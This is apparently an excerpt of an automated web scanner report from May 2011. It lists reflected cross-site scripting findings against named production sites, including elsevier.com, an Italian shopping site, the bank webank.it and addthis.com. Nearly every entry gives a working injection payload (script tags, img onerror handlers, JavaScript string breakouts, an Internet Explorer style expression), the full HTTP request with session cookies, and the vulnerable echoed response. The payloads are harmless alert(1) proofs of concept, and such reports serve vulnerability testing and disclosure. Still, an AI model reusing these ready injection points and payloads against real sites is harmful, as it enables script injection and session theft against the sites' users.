GET /wps/find/advproductsearch.cws_home711ec'><img%20src%3da%20onerror%3dalert(1)>485db6800ac HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:33 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Content-Length: 24968 Set-Cookie: JSESSIONID=00002FURpPzg7bKWUP9lHpWiGEE:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... <LI class="lvl2" id="subItem2" onclick='window.location.href="/wps/find/all_products_browse.cws_home711ec'><img src=a onerror=alert(1)>485db6800ac"'> ...[SNIP]...
4.32. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elsevier.com
Path:
/wps/find/advproductsearch.cws_home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6beef'><script>alert(1)</script>6a8aa79299f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/find/advproductsearch.cws_home?6beef'><script>alert(1)</script>6a8aa79299f=1 HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:30 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Content-Length: 18350 Set-Cookie: JSESSIONID=0000-3iLOWqG5wZUSadWSvkeTti:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... <a href='/wps/find/advproductsearch.cws_home?6beef'><script>alert(1)</script>6a8aa79299f=1&navopenmenu=3'> ...[SNIP]...
4.33. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elsevier.com
Path:
/wps/find/advproductsearch.cws_home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7daa0"%3balert(1)//24fac7af3ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7daa0";alert(1)//24fac7af3ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/find/advproductsearch.cws_home?7daa0"%3balert(1)//24fac7af3ed=1 HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:30 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Content-Length: 18288 Set-Cookie: JSESSIONID=0000NaRz-vRLRFXUkrLZVh70rOz:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... ("This page does not have a printer-friendly version") return } } else { printUrl += pieces[i] } prvPiece = pieces[i] } var isTheirParams = "false" var qpString = "7daa0";alert(1)//24fac7af3ed=1&7daa0";alert(1)//24fac7af3ed=1" if(qpString.length > ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ff19'><img%20src%3da%20onerror%3dalert(1)>6e976a58f0b was submitted in the REST URL parameter 3. This input was echoed as 6ff19'><img src=a onerror=alert(1)>6e976a58f0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /wps/find/subject_area_browse.cws_home6ff19'><img%20src%3da%20onerror%3dalert(1)>6e976a58f0b HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:47 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Content-Length: 25013 Set-Cookie: JSESSIONID=0000WXbl3Gp56KXUmnZV1uMnTNX:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90f99"><img%20src%3da%20onerror%3dalert(1)>9406b9f8f6e was submitted in the REST URL parameter 3. This input was echoed as 90f99"><img src=a onerror=alert(1)>9406b9f8f6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /wps/find/subject_area_browse.cws_home90f99"><img%20src%3da%20onerror%3dalert(1)>9406b9f8f6e HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:46 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Content-Length: 25015 Set-Cookie: JSESSIONID=0000ssegcLJle5F04Nbyc1eLqaz:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c03b8"%3b28e045484d9 was submitted in the REST URL parameter 3. This input was echoed as c03b8";28e045484d9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/find/subject_area_browse.cws_homec03b8"%3b28e045484d9 HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:47 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Content-Length: 24501 Set-Cookie: JSESSIONID=0000IqCGtqTnRlkAqBgeR1iBcZg:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... <img src="+ns_l+" width='1' height='1'>");} sitestat("http://nl.sitestat.com/elsevier/elsevier-com/s?general_info.subject_area_browse&category=cws_homec03b8";28e045484d9"); </script> ...[SNIP]...
4.37. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elsevier.com
Path:
/wps/find/subject_area_browse.cws_home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60b28'><script>alert(1)</script>3bb27476df4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/find/subject_area_browse.cws_home?60b28'><script>alert(1)</script>3bb27476df4=1 HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:42 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Set-Cookie: JSESSIONID=0000rcMiH_yB4nrWwiHnqA0Omt0:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 209457
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... <a href='/wps/find/subject_area_browse.cws_home?60b28'><script>alert(1)</script>3bb27476df4=1&navopenmenu=3'> ...[SNIP]...
4.38. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elsevier.com
Path:
/wps/find/subject_area_browse.cws_home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e8cf"%3balert(1)//1fe8f7ceeb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e8cf";alert(1)//1fe8f7ceeb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/find/subject_area_browse.cws_home?9e8cf"%3balert(1)//1fe8f7ceeb7=1 HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:44 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Set-Cookie: JSESSIONID=0000eJInQ8ymYaOaIpU3u5eS2ZN:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 209414
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... ("This page does not have a printer-friendly version") return } } else { printUrl += pieces[i] } prvPiece = pieces[i] } var isTheirParams = "false" var qpString = "9e8cf";alert(1)//1fe8f7ceeb7=1&9e8cf";alert(1)//1fe8f7ceeb7=1" if(qpString.length > ...[SNIP]...
The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2c81"><script>alert(1)</script>05d12a7095a was submitted in the locale parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]... <link rel="stylesheet" href="/it_ITc2c81"><script>alert(1)</script>05d12a7095a/static/css/mobile/mobile.css" media="screen" /> ...[SNIP]...
4.40. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shopping24.ilsole24ore.com
Path:
/sh4/catalog/Category.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b5c7"><script>alert(1)</script>626d1de0ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:37:49 GMT Set-Cookie: JSESSIONID=01EC0E3AE923672F051417E1FEAC132D; Path=/ Set-Cookie: ATG_SESSION_ID=01EC0E3AE923672F051417E1FEAC132D; Path=/ X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ] Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 53893
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <input name="4b5c7"><script>alert(1)</script>626d1de0ab" type="hidden" value="1"/> ...[SNIP]...
4.41. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shopping24.ilsole24ore.com
Path:
/sh4/catalog/Category.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7248'><script>alert(1)</script>243af41db24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:37:55 GMT Set-Cookie: JSESSIONID=FE9BC8B10A09676DD5B1BF644DEBD840; Path=/ Set-Cookie: ATG_SESSION_ID=FE9BC8B10A09676DD5B1BF644DEBD840; Path=/ X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ] Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 53491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Category.jsp?CATID=SH246140&b7248'><script>alert(1)</script>243af41db24=1&login=failed'> ...[SNIP]...
4.42. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shopping24.ilsole24ore.com
Path:
/sh4/catalog/Product.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 87779'><script>alert(1)</script>162b4a1d039 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Tue, 03 May 2011 00:13:25 GMT X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ] Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 34251
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Small Office 24 ...[SNIP]... <input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Product.jsp?PRODID=SH246237857&87779'><script>alert(1)</script>162b4a1d039=1&login=failed'> ...[SNIP]...
4.43. https://www.webank.it/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.webank.it
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d98eb'-alert(1)-'63578c43715 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d98eb'-alert(1)-'63578c43715=1 HTTP/1.1 Host: www.webank.it Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463
var tabId = 'nav_pub_wb_home_nw'; var obsKey = 'nav_pub_wb_home_nw?d98eb'-alert(1)-'63578c43715=1'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
var login_action_privati = 'lqgd7CdsPrF ...[SNIP]...
The value of the OBS_KEY request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3bdfb'style%3d'x%3aexpression(alert(1))'6c2bb6a8eb3 was submitted in the OBS_KEY parameter. This input was echoed as 3bdfb'style='x:expression(alert(1))'6c2bb6a8eb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank3bdfb'style%3d'x%3aexpression(alert(1))'6c2bb6a8eb3 HTTP/1.1 Host: www.webank.it Connection: keep-alive Referer: http://www.webank.it/lndpage/promo321.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 572f4'-alert(1)-'a0f1e2f6476 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank572f4'-alert(1)-'a0f1e2f6476 HTTP/1.1 Host: www.webank.it Connection: keep-alive Referer: http://www.webank.it/lndpage/promo321.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var tabId = 'nav_pub_wb_conti_nw'; var obsKey = 'pro_wbn_apri_conto_webank572f4'-alert(1)-'a0f1e2f6476'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
var login_action_privati = 'lwHtAMSw9BODj ...[SNIP]...
The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5264c'-alert(1)-'a24ae3b893b was submitted in the tabId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw5264c'-alert(1)-'a24ae3b893b&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1 Host: www.webank.it Connection: keep-alive Referer: http://www.webank.it/lndpage/promo321.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var tabId = 'nav_pub_wb_conti_nw5264c'-alert(1)-'a24ae3b893b'; var obsKey = 'pro_wbn_apri_conto_webank'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bafc6'-alert(1)-'e07e81d0343 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var tabId = 'nav_pub_wb_serveaiuto_nw'; var obsKey = 'pro_wbn_serve_aiutobafc6'-alert(1)-'e07e81d0343'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
var login_action_privati = 'ONlKQrGjkXhRV ...[SNIP]...
The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d828'-alert(1)-'64857d4afb was submitted in the tabId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var tabId = 'nav_pub_wb_serveaiuto_nw8d828'-alert(1)-'64857d4afb'; var obsKey = 'pro_wbn_serve_aiuto'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a419d'-alert(1)-'ffb669067a9 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webankpub/wb/home.do?tabId=nav_pub_wb_home_nw&OBS_KEY=nav_pub_wb_home_nwa419d'-alert(1)-'ffb669067a9 HTTP/1.1 Host: www.webank.it Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463
var tabId = 'nav_pub_wb_home_nw'; var obsKey = 'nav_pub_wb_home_nwa419d'-alert(1)-'ffb669067a9'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
var login_action_privati = 'MBbmJoDCIdKWw ...[SNIP]...
The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c5f2'-alert(1)-'b008920cca9 was submitted in the tabId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webankpub/wb/home.do?tabId=nav_pub_wb_home_nw7c5f2'-alert(1)-'b008920cca9&OBS_KEY=nav_pub_wb_home_nw HTTP/1.1 Host: www.webank.it Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463
var tabId = 'nav_pub_wb_home_nw7c5f2'-alert(1)-'b008920cca9'; var obsKey = 'nav_pub_wb_home_nw'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e58f"><script>alert(1)</script>ec94702f118 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7e58f"><script>alert(1)</script>ec94702f118
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:27:33 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96631
